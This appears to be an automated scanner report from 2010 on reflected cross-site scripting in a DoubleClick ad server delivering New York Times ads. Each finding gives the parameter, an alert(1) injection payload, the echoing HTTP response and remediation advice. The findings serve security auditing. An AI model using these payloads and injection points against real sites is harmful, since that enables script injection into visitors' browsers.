This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... pc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt49a397'-alert(1)-'995d035cf44&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\"> ...[SNIP]...
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35005"-alert(1)-"41c9df98c41 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=35005"-alert(1)-"41c9df98c41http://www.respire.hyatt.com?src=agn_hhc_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53295'-alert(1)-'b8913ad603b was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=53295'-alert(1)-'b8913ad603bhttp://www.respire.hyatt.com?src=agn_hhc_ba_nyt\"> ...[SNIP]...
4.8. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N4300.NYTimes/B4933145
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d553"-alert(1)-"341ef100f1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6575
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ngs.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=&2d553"-alert(1)-"341ef100f1a=1http://www.respire.hyatt.com?src=agn_hhc_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "f ...[SNIP]...
4.9. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N4300.NYTimes/B4933145
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73647'-alert(1)-'11293dd737 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6571
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ngs.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=&73647'-alert(1)-'11293dd737=1http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\"> ...[SNIP]...
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1849'-alert(1)-'2cc4670e0ae was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 54%3B4307-300/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectorye1849'-alert(1)-'2cc4670e0ae&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=a ...[SNIP]...
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcfa4"-alert(1)-"cc117967b6a was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 54%3B4307-300/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryfcfa4"-alert(1)-"cc117967b6a&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=a ...[SNIP]...
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dce1f"-alert(1)-"06f671b37b9 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddledce1f"-alert(1)-"06f671b37b9&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt ...[SNIP]...
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 393c6'-alert(1)-'1d2aff2c6c1 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle393c6'-alert(1)-'1d2aff2c6c1&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt ...[SNIP]...
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66d30'-alert(1)-'7905f129f26 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... e=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a66d30'-alert(1)-'7905f129f26&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\"> ...[SNIP]...
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42ca9"-alert(1)-"a08685d2013 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... e=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a42ca9"-alert(1)-"a08685d2013&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 340e4'-alert(1)-'7afe9285df0 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3340e4'-alert(1)-'7afe9285df0&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\"> ...[SNIP]...
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f591d"-alert(1)-"9e1f07ef07d was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3f591d"-alert(1)-"9e1f07ef07d&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = "";
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b1aa'-alert(1)-'9131abe2505 was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick6b1aa'-alert(1)-'9131abe2505&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\"> ...[SNIP]...
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90c03"-alert(1)-"db085e619ba was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick90c03"-alert(1)-"db085e619ba&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscrip ...[SNIP]...
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91c16'-alert(1)-'1145846c2df was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... tml?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=128980207291c16'-alert(1)-'1145846c2df&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\"> ...[SNIP]...
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2bd3"-alert(1)-"fe005cef2e0 was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... tml?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072e2bd3"-alert(1)-"fe005cef2e0&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "neve ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b60df'-alert(1)-'060f0b2a3b7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:17:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 8/3a53/7/12b/%2a/f%3B231182659%3B0-0%3B0%3B55362154%3B4307-300/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotob60df'-alert(1)-'060f0b2a3b7&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48242"-alert(1)-"d0ace12d614 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:17:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 8/3a53/7/12b/%2a/f%3B231182659%3B0-0%3B0%3B55362154%3B4307-300/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto48242"-alert(1)-"d0ace12d614&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60 ...[SNIP]...
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6ea6"-alert(1)-"8c77f1839e3 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:09 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmptb6ea6"-alert(1)-"8c77f1839e3&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt"); var fs ...[SNIP]...
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c87a2'-alert(1)-'1670f8dc654 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmptc87a2'-alert(1)-'1670f8dc654&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\"> ...[SNIP]...
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff51d'-alert(1)-'ce15ab17f86 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4ff51d'-alert(1)-'ce15ab17f86&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=a ...[SNIP]...
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ece3a"-alert(1)-"92527edee20 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
